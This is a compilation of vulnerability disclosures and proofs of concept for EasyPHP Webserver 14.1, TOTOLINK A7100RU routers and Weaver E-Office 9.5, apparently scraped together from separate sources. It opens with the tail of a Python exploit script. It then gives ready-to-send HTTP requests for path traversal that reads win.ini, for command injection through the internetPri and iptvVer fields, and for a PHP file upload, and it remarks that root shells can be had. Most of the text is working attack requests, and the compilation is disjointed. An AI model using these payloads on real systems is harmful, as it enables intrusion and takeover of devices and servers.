AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4433.0 Safari/537.36"  
    }  
    data = {'app_service_control':payload}

    try:  
        r = requests.post(url, headers=headers, data=data)  
    except requests.exceptions.ReadTimeout:  
        print("The payload has been sent. Check it!")  
        pass

# Vulnerability Type: Path Traversal

CVSS v3: 6.5  
CVSS vector: 3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N  
CWE: CWE-22

Vulnerability description: An issue was discovered in EasyPHP Webserver  
14.1. An Absolute Path Traversal vulnerability in / allows remote users to  
bypass intended SecurityManager restrictions and download any file if you  
have adequate permissions outside the documentroot configured on the server.

Proof of concept:

GET /..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/windows/win.ini  
HTTP/1.1  
Host: 192.168.X.X:10000  
Connection: Keep-alive  
Accept-Encoding: gzip,deflate  
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML,  
like Gecko) Chrome/41.0.2228.0 Safari/537.21  
Accept: */*

HTTP/1.1 200 OK  
Host: 192.168.X.X:10000  
Connection: close  
Content-Type: application/octet-stream  
Content-Length: 499

; for 16-bit app support [fonts] [extensions] [mci extensions] [files]  
[Mail] MAPI=1 CMCDLLNAME32=mapi32.dll CMCDLLNAME=mapi.dll CMC=1 MAPIX=1  
MAPIXVER=1.0.0.1 OLEMessaging=1 [MCI Extensions.BAK] 3g2=MPEGVideo  
3gp=MPEGVideo 3gp2=MPEGVideo 3gpp=MPEGVideo aac=MPEGVideo adt=MPEGVideo  
adts=MPEGVideo m2t=MPEGVideo m2ts=MPEGVideo m2v=MPEGVideo m4a=MPEGVideo  
m4v=MPEGVideo mod=MPEGVideo mov=MPEGVideo mp4=MPEGVideo mp4v=MPEGVideo  
mts=MPEGVideo ts=MPEGVideo tts=MPEGVideo

EasyPHP Webserver 14.1 Path Traversal / Remote Code Execution

TOTOLINK A7100RU V7.4cu.2313_B20191024 has a Command Injection vulnerability. An attacker can obtain a stable root shell through a specially constructed payload.

**TOTOlink A7100RU(V7.4cu.2313\_B20191024)路由器存在命令注入漏洞****写在前面**

厂商信息：http://totolink.net/

固件下载地址：http://totolink.net/home/menu/detail/menu\_listtpl/download/id/185/ids/36.html

**1.影响版本**

图1为固件版本信息

**2.漏洞细节**

程序通过获取参数internetPri中的内容传递给v20，之后将v20带入到Uci\_Set\_Str函数中

在Uci\_Set\_Str函数中，通过snprintf函数，将a4匹配到的内容格式化进v11，之后将v11带入cstesystem函数中

函数直接将用户输入内容带入到execv函数中，存在命令注入漏洞

**POC**

POST /cgi\-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
Content\-Length: 79
Accept: \*/\*
X\-Requested\-With: XMLHttpRequest
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
Content\-Type: application/x\-www\-form\-urencoded; charset\=UTF\-8
Origin: <http://192.168.0.1>
Referer: <http://192.168.0.1/adm/status.asp?timestamp=1647872753309>
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q\=0.9
Cookie: SESSION\_ID\=2:1647872744:2
Connection: close

{"topicurl":"setting/setSmartQosCfg",
"internetPri":"1$(ls>/tmp/123;)"

复现结果如下

图2 POC攻击效果

最后，您可以编写exp，这可以实现获得根shell的非常稳定的效果

CVE-2023-30054: ttt/161 at main · Am1ngl/ttt

TOTOLINK A7100RU V7.4cu.2313_B20191024 is vulnerable to Command Injection.

**TOTOlink A7100RU(V7.4cu.2313\_B20191024)路由器存在命令注入漏洞****写在前面**

厂商信息：http://totolink.net/

固件下载地址：http://totolink.net/home/menu/detail/menu\_listtpl/download/id/185/ids/36.html

**1.影响版本**

图1为固件版本信息

**2.漏洞细节**

程序通过获取参数iptvVer中的内容传递给v19，之后将v19带入到Uci\_Set\_Str函数中

在Uci\_Set\_Str函数中，通过snprintf函数，将a4匹配到的内容格式化进v11，之后将v11带入cstesystem函数中

函数直接将用户输入内容带入到execv函数中，存在命令注入漏洞

**POC**

POST /cgi\-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
Content\-Length: 79
Accept: \*/\*
X\-Requested\-With: XMLHttpRequest
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
Content\-Type: application/x\-www\-form\-urencoded; charset\=UTF\-8
Origin: <http://192.168.0.1>
Referer: <http://192.168.0.1/adm/status.asp?timestamp=1647872753309>
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q\=0.9
Cookie: SESSION\_ID\=2:1647872744:2
Connection: close

{"topicurl":"setting/setSmartQosCfg",
"iptvVer":"1$(ls>/tmp/123;)"

复现结果如下

图2 POC攻击效果

最后，您可以编写exp，这可以实现获得根shell的非常稳定的效果

CVE-2023-30053: ttt/160 at main · Am1ngl/ttt

A vulnerability was found in Weaver E-Office 9.5. It has been rated as critical. Affected by this issue is some unknown functionality of the file App/Ajax/ajax.php?action=mobile_upload_save. The manipulation of the argument upload_quwan leads to unrestricted upload. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-228014 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.

    POST /E-mobile/App/Ajax/ajax.php?action=mobile_upload_save  HTTP/1.1
    Host: xx:8088
    Content-Length: 338
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    Origin: null
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundarydRVCGWq4Cx3Sq6tt
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
    Connection: close
    
    ------WebKitFormBoundarydRVCGWq4Cx3Sq6tt
    Content-Disposition: form-data; name="upload_quwan"; filename="1.php@"
    Content-Type: image/jpeg
    
    <?php phpinfo();?>
    ------WebKitFormBoundarydRVCGWq4Cx3Sq6tt
    Content-Disposition: form-data; name="file"; filename=""
    Content-Type: application/octet-stream
    
    
    ------WebKitFormBoundarydRVCGWq4Cx3Sq6tt--

Tag

#webkit